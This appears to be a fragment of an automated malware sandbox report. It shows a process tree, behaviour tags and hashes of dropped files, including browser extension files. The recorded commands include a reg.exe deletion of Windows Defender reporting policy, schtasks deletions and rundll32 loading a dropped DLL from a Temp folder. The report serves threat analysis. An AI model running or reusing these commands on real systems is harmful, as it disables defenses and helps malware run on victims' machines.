C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3480
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vFsADyudLcNCFLIiL"2⤵PID:848
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\AZgKexhzWxKGMSOL\jTphKxdH\FbbEXZg.dll",#1 /Nwsite_idbpL 3851181⤵PID:3364
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\AZgKexhzWxKGMSOL\jTphKxdH\FbbEXZg.dll",#1 /Nwsite_idbpL 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2888 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LPyXfDhiQUyhASpny"3⤵PID:1752
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57f572381518f780cc935a66980c574c8
SHA183d7343c6b3f70a1235cd72cb305293f4202c294
SHA25685411282f7048bb59ac7b2b284da6a961320f9ded92b6b0666e637e36879111d
SHA512e7cba8927df05f42c347f3b39a64bdeb5dcb8df4450e1be2b27f1475958d4ee499e51db06c50afac51ebe3f6b7cd17b1512ffef1622e9f6c97905c1d33ad18b1
-
Filesize
2KB
MD5a56416bb59576fb3bed824f97fece0b4
SHA190f3c4779e575e3cea253b63ce719401f99c9d3a
SHA2566b10a5baea36627ea16c17c6f1dc0d6bd451a9182cb78536e09717fda9c5f459
SHA512380261620520ac1520385350f9dabbea3f1a8ec37469f0ca6b43ebea2347382d91a4171fb149d1fdd6f5bbf9b2b941b00fd0f27588cb060e13fcfe9147f3aff8
-
Filesize
2KB
MD59b8987728312d38910214d8cbf17185a
SHA196e5aaca160874c36d609ff49988d71b4d9387ab
SHA25691d3b03039413ce2a6b95cff353629a242e8fe837f6a40035cef1c9d4d91535a
SHA51280b19de8bea0bb5d0594384edfea547eeef438b2a34694f1755a49d96827daa0437a19caca41e43909c95feb1fc29653c716fee1fc673583906bb516fa81cc33
-
Filesize
2KB
MD5795f86ca991d3f6e728cce221c951e49
SHA1e651e676262495d90d109019f0f5db769b55d95b
SHA25689592ecfc1b3e34bb9950dd5313515ea45e40fb6781cd42e77d395be03ddc652
SHA512879c059fe6ac4bf50836ae458c141fb8ed50c56b7c01b3d3e866c0333fc69ac688a3f5720becdd3ea615a38b0df44d1c45c712b8b554896e550a9fdc38db280f
-
Filesize
256KB
MD58c3a956c260a1ac33e08ea1b2f058c7f
SHA1a7b40cdc2ad2c53ef41ea6127d4136c7905d374c
SHA256a9aebbbd13c50a423aa8ab4c623773d2071d5acda60fe2292e45e21dead2b304
SHA512d220a22bcbfb3402857f4404f8a0bcc36f46c31766987d2e879129bae689ea2e92d26148c8fb7d67ebf0aee206aba657b91fac8aa4ba656276f2ee32fcd9b469
-
Filesize
2KB
MD5dbf3b46dd9f5dc55e63c6eda8bdbe549
SHA1e6b1152f8fce71d05ac7b915116ef880d6c2b040
SHA2560a6fff0f31e21ba744b99b1d1b91f7936406bd30d2467a68aaa834a6c696c1fd
SHA512f1b2b8ef89550bbdd31e6e7d14dedeb198575c8555e77dbb1f1baa0124f86899efa7bb97a5c710125894776e07a79568507ce6fcdf675b23ffa0825307368e52
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5e69fdb01593c6525fe83e4848aa95cdb
SHA18508c9c601dfa744d8fe398ace7bcaa5afc5cad0
SHA256760c55efb5b1100f0c6ae59d6a830497db8e58757b26b560d434047e6fdb8300
SHA512e1f0e0b39074b36f61b3c12c33eadb0e3ab77e24fdef2c89c07b9c6a4c4cff411266fbfdfdae6bc766afb3b7fdb353f8e57b01a6b8c98956c1eb7f822cb44d4d
-
Filesize
35KB
MD5b3867a78967b8fc4ccaaacff27546794
SHA13ec14f655c5a2c7225faef4ba79b5820201b0e09
SHA2566dbe9d4d87f0f717e0c1fbf45d0feaf7aa66eb60a15a416ad1183357a57b9261
SHA512d77383f0c92de14f92af590ff23a8d6cbd0b142a75cd700a51b10eb4753a028fd6bc1eb7707f3d11d589c32c2c12d11539c9aaff1d0e6bcc7d3a6d0897b09ff5
-
Filesize
2KB
MD570b5c12959dea82e64a05dec518878ac
SHA1844ef1b5046ddb6dbdd2d2e661c0816f76379a49
SHA25648e18b18f8ae0e0a0129f36bb801af13e9e429254348fc8203e357564f378283
SHA5125e710a93a1ed5828359675712aba9db288a66ed1aa469cedbabcfecbe8a7c78c2a4c86ce199519acb713892e5875e69098b31eeb340d6f06452111d5481648b9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
64B
MD569914540a7d0ee28d4aa3e58355dce11
SHA1d9a9a449809a68a59c550540f20b23a011faf97d
SHA256f9479e654c3cd75eb81737166fd945f3ac72a01738cd2a91e45f757762927577
SHA512a43356896b00a35907d3a42fae775602745762cfbc8cd1173573bfc54d31cb3aa6eab5c595d75ded304bde63c8c314921d47c305beaca399375a618fef9bae5d
-
Filesize
6.3MB
MD54b52f60c55866ad32ac6f5ead0650115
SHA19160434c2d2585a045724c0c50efd359f21afdef
SHA25605f82f772f3cc0896ebc5482417bd8742dbf9e663ff20b4ea9d6c8cd86ddef04
SHA51264839e26dfac7528908df592c8fe0426a1855bafccb5520f0515905a231528753b2b8269d7d9172ab937738b470fa8850f0963ec8e15602d8f992604a0feea01
-
Filesize
6.7MB
MD53281414d3675e4c0b3bcec436800f6cb
SHA1d4aea34e5e4e238117fb3d07815995f46454536d
SHA256c67a85e8acddba0f7a25426de4d9c541958ec568703450b07a1d326a340b6136
SHA5123b3e54367894ad5a2cd9123cf65f3a0cbd9c05de31bd6be359011d17cca0d5967adfda1f36b3af717ddee609fe581a1447899da9fb56de446432b22f26317cba
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6.4MB
MD5e35d6fe2939dab08580ad1f5d4508df5
SHA1f51b525a1947a373a77f6f7522801f628d79306f
SHA256504a99c8190dc51d050f4df9dfd6aea4876a3b63fdfab7add677ab8508c79a2c
SHA512077b3e8db536ec8cfcd32ae9bcd04c9923bc6e8c1b3632a8e63af7abe71991d1615d91d0a7c837a5804b3c69ca13578f3598a92e79c989416c13d00719461035
-
Filesize
6KB
MD5e6459429afe1f132298a6ac2a99aa223
SHA189ffcbb0b7bfb532a000a70e4419f3b835248434
SHA25694f6d426bdacd6c97475df47dc23f3d970ca76caa8887154dbe1a7040e4faf67
SHA51293c5458db2928e36e405f7c7046bffc4786b5d14f602d217994aa26efc1e88eee40ac696a52df598a21fa834bd93dd91fcc11bb2f386ad1a43a9b29db13b1160
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD55b74da6778ccaa0e1ca4ae7484775943
SHA10a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA51220b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD558b2fe59553275e5e4dba9c31b639c3a
SHA1706f9f0b052606b9d1c8f323bcc33860639c89a9
SHA25617253d2aaa806688436328f9682fdff1d1943992d2a4cc06292cec9d9dbd0865
SHA512d3137f4d870cd94de5b053b0f351ff48188c08684761e89831535e4a6b1b911d1ddc92d2b8c2c6c8117810f44529d54e1fcde1f62eea11a9510b435b7fbb4f02
-
Filesize
6.4MB
MD5b0a4851cd139419fb61dffef02245237
SHA10540309c7c46e9e3d6a3a721c7eda8e06abbfe38
SHA2568b8aa4c6444b829657d364ce8013333befa0dce7a5a39bd53f80e527abc3fe33
SHA5126f147bd59210c73f7732c4fadaa9ec33d5611aa9dbea47de3e17543c4de7e23e7651eb9ce45ce34debb8c6c19d7f9956f69682c2b026b70b6bc530a16ff27172
-
Filesize
6.3MB
MD5847c1e20fff13b1280e49d9f504a6cc4
SHA15c0d975a787579e8befd77f52e91299af44ce440
SHA256518df014b98aeb942df7409d337d8b51da4c82b52ad4f052d647eb3c998c6de8
SHA51204f253b93ba7bc4ce92ff5a8f522ecebe76e48df4cabafe688d8478da7fb407c80af909919a842391ce0563c89f2ba727d9fa02a4e285f54bf94c5c2febfc90c
-
Filesize
6.6MB
MD54662194155620972d175945d04d86bb6
SHA154d15c4f5180292c1b238b73062c546750f1d6e8
SHA2563907f969227174a57800f2c58d084e37b7975bbe2d7259a3bf34ac84b3ac462b
SHA512d8ba716347e5f52cac1a6994d916e98467f9314afccedf052ee68077f442695014ea3ac6a374583226191123b1ecc680efa203b31201ee14728e9c632f860b9f
-
Filesize
5KB
MD5a4c8f612d20d295119176ed924d69a1b
SHA1bb3a21b4452e3d1c6a2284f80d0d609005b0c5b4
SHA256edf3757fe41d2ad3d245ee4c69cc91f215e7369389b9f7496ca029df9bf05ff2
SHA51278a80f91769dc7a31e956d00055b1ad6ad3d1f5e1897082178d6b1bc749276fe0b152709efe0e0111a4eb278bd9e602d4652ed504a5e32955b72526cb5b631e2
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732